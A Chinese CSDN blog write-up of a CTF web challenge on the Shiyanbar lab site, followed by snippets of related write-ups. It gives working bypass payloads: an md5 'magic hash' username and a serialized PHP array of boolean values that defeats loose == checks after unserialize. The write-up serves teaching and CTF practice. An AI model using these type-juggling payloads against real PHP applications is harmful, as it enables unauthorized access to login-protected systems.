实验吧-天网管理系统

最新推荐文章于 2020-10-31 21:43:10 发布
最新推荐文章于 2020-10-31 21:43:10 发布
阅读量313 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576368
版权

天网管理系统

原题链接

http://ctf5.shiyanbar.com/10/web1/

分析

查看源码

<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

easy

username=QNKCDZO
页面结果
/user.php?fame=hjkleffifer

进入链接

$unserialize_str = $_POST['password'];
     $data_unserialize = unserialize($unserialize_str);
     if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
     {
       print_r($flag);
     }
伟大的科学家php方言道:成也布尔,败也布尔。
回去吧骚年

反序列化,php的提示是说bool。
'???'是一个字符串,注意到这里用的是==,也就是说很可能可以利用php弱类型。

<?php
var_dump(true=='olivia');
//bool(true)

所以这里payload 很简单。

<?php
$test = array("user"=>true,"pass"=>true);
$stest = serialize($test);
echo $stest."\n";
?>
//a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

但是注意,要回到index.php提交password。

flag

ctf{dwduwkhduw5465}

知识点

php序列化与反序列化
php弱类型

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验天网管理系统
3tu6b0rn的博客
03-28 336
题目链接:http://ctf5.shiyanbar.com/10/web1/ 查看源代码 要求输入的用户名的值md5之后等于0 百度下就能知道很多md5为0的值 MD5加密后==’0’ 总结 找到新链接 $unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); i...
暑期练习web3:天网管理系统实验吧)
qq_41618162的博客
07-31 759
我们首先打开题目,随便试试发现没有任何反应 我们查看一下源码 &lt;html&gt; &lt;head&gt; &lt;meta charset=utf8&gt; &lt;title&gt;最安全的管理系统&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;h1&gt;天网管理系统&lt;/h1&gt; &l
实验吧-天网管理系统【php弱类型==与===的利用】
Sp4rkW的博客
08-07 4253
首先打开网页,查看源代码: 很明显有一行备注是给我们看的, &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 这很明显是个php弱类型问题,md5加密等于0,详情见我的博客【php弱口令总结】略过 将username替换之后bp可得如下代码: 很明显,这是告诉我们去访问一个新...
实验吧-web-天网管理系统
a3uRa的一个窝
08-13 488
这个题一共有两关 第一关 &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 很简单 第二关,涉及到php反序列化的知识了,正好最近在看 网上的wp大都没有给出最后的payload:a:2:{s:4:”user”;b:1;s:4:”pass”;b:1;} 如何来的 &lt;?php...
实验吧--天网管理系统
qq_41281571的博客
07-30 652
天网管理系统 关于php的弱类型漏洞:在php中,定义变量之前没有像其他语言一样要求我们先说明该变量的类型。在他这里,无论你是字符,数字,数组都是直接$+变量名,那么怎么判断两个变量是否相等呢?在php中的==运算符下,会把类数值型数据(如含有数字的字符串)转换成数字处理。比方说在数字与字符串作比较时: 3=="3aasda" 结果竟然是true,也解释说他会把字符串的第一个非数字字符前的...
实验天网管理系统Writeup
驻足
05-01 1643
实验天网管理系统Writeup 原题地址 实验吧–天网管理系统 用到的知识点: 1.php弱类型相等 2.php函数serialize()与unserialize()(序列化和反序列化) 首先查看源文件,发现提示: &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 意思就是将输入的...
实验吧-web-wp
Iambangbang的博客
08-21 606
登陆一下好吗? 这道题目是一道技巧性的题目,显然,问题的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道题是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
CTF实验吧-WEB专题-3
qq_18661257的专栏
12-21 3157
1.安女神之名 题解 通过题目我们知道,要输入安女神,发现直接输入安女神会报英文,然后就恢复到原页面了,删除cookies后才能看到最开始的原界面,然后就是各种编码了,使用了XEESS来处理,发现可以显示安女神但是得不到flag,基本可以确定是另外一种编码,然后用unicode编码,就可以成功了,成功得到flag.2.思路很重要 题解 通过查看源代码,可以发现代码没有删除,所以应该是有备份或
实验吧-Web-天网管理系统
烟雨天青色
11-25 1387
点开解题链接,会出现一个如下页面: 乍一看,真好!用户名,密码都给填上了,可是。。。。点击“登入系统”。。。咦~没反应!没反应!!!好吧,F12查看网页源代码 发现问题了。。。 我们看到注释里面有一个提示,当传入的username值经md5加密后等于0,就会返回某样东西。 在某些情况下,PHP会把类数值数据(如含有数字的字符串等)转换成数值处理,== 运算符就是其中之一。在使用...
实验吧Web-天网管理系统
abg49988的博客
09-17 98
笔记 == :  比较运算符号 不会检查条件式的表达式的类型 ===:恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bool) PHP序列化与反序列化serialize() 对输入的数据进行序列化转换unserialize() 恢复原先变量,还原已经序列化的对象。 关于php序列化与反序列化,可以参考:http://www.111cn.net/ph...
天网管理系统-实验
Xi4or0uji
05-14 581
进去页面看源码看见有这样一句也就是说,username有个md5函数漏洞,可以用QNKCDZO绕过绕过以后返回访问一下就看见$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); if($data_unserialize['user'] == '???' &a...
CTF 实验天网管理系统
The Road Of Sec
10-18 4461
1. 点击登入系统,并没有反应 2.直接F12 查看源码 3.发现异常 有一段代码:    要求用户名传入一个字符串,经过md5加密后要等于0。    md5加密自行百度就可得知 4.插播一段有关于 PHP弱类型的相关知识   在php中 == :  比较运算符号  不会检查条件式的表达式的类型 ===:  恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bo
实验吧web天网管理系统
whyrookie的博客
09-01 115
直接查看源码 <!--$test=$_GET['username']>这一行 源码的下面给了我们一些提示:我们输入的username经过md5加密后会赋值给test。当test为0时就会跳出新的东西,这时候我们就要构思,如何才能让test为0? 显然将0提前md5解密是不行的,而在php中==是只进行值的比较,不管二者的类型。当两个字符串进行==比较的时候,PHP会把类数值的字符串转换为数值进行比较,如果参数是字符串,则返回字符串中第一个不是数字的字符之前的数字串所代表的...
天网管理系统
weixin_30245867的博客
07-19 229
点击登录发现没用 然后康康源码 给出提示test使用的是md5加密,如果id为0就。。。。 这里使用php中==的漏洞,==只比较值的大小并不会比较数据类型 所以这里使用md5(0)的相等值240610708输入到username中 弹出提示 似乎是网页的后缀,加进去试试 似乎让我们用布尔? 这段代码的大概意思是取得password的值,再使用unserial...
西普实验吧ctf-web-天网管理系统(序列化与反序列化)
烟敛寒林的博客
12-28 652
题目地址:http://ctf5.shiyanbar.com/10/web1/ 首先还是查看页面源代码,发现注释有一个提示: 当传入的username值经md5加密后等于0,就会返回某样东西! 如何绕过md5函数呢?可以参考下面这篇文章。 https://blog.csdn.net/dyw_666666/article/details/82348564 我们可以用QNKCDZO...
实验吧WEBWP(一)
Yale的博客
03-19 2699
1.Forms(链接:http://www.shiyanbar.com/ctf/1819) 页面很干净,第一反应查看源码 在此之前,我们先随便输入然后点击enter,没什么线索 源码中我们看到value=0 将value改为1,再随便输入然后点击enter 毫无疑问,输入的内容就应该是a的值 得到flag2.天网管理系统(http://www.shiyanbar.com/ctf/
人脸识别与天网系统
python__reported的博客
10-31 2202
人脸识别与天网系统一、结果二、识别库三、实现代码 一、结果 识别对象 第一个是名字,第二个是百度上的内容 二、识别库 face_recognition 三、实现代码 class Face_recognition(): def __init__(self,pic,pics): self.pic = pic self.pics = pics self.name = "" def face_know(self,file): known_image = face_recogni
天网管理系统(反序列化问题)
Gunther的博客
08-28 3471
http://www.shiyanbar.com/ctf/1810 天网管理系统 天网你敢来挑战嘛 格式:ctf{ } 解题链接: http://ctf5.shiyanbar.com/10/web1/ 查看源码如下: 最安全的管理系统 天网管理系统 安全与你同在 账户:admin  密码:admin 就是这么光明正大的放置用户名和密码,爸爸说我们再也不会忘记密
大数据与信息安全(六)天网系统与大数据 大数据
cqacrh2798的博客
10-21 1564
大数据与信息安全(六) 大数据是什么?大数据是一个极为强大的信息数据的采集和收录系统,可以将我们日常工作生活中的所有数据,近乎可以全盘收录。大数据系统的设立,就是为了方便统计,不需要过去繁琐的操作,通过什么个体采样、分批采样等统计模式来获取信息数据,而是将所能采集到的数据,都通过大数据系统近乎完全彻底的收录进来,然后通过云计算来进行数据的分析处理,最后得出相应结论。大数据和云计算得出的结论...
网络安全自学笔记:实验吧CTF实战-WEB渗透与隐写术解析
在CTF实战中,涉及的题目类型包括但不限于:"这是什么"、"天网管理系统"、"忘记密码"、"false"、"天下武功唯快不破"以及"隐写术之水果、小苹果"。这些题目设计旨在让学习者实际操作,锻炼他们的分析和解决问题的能力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值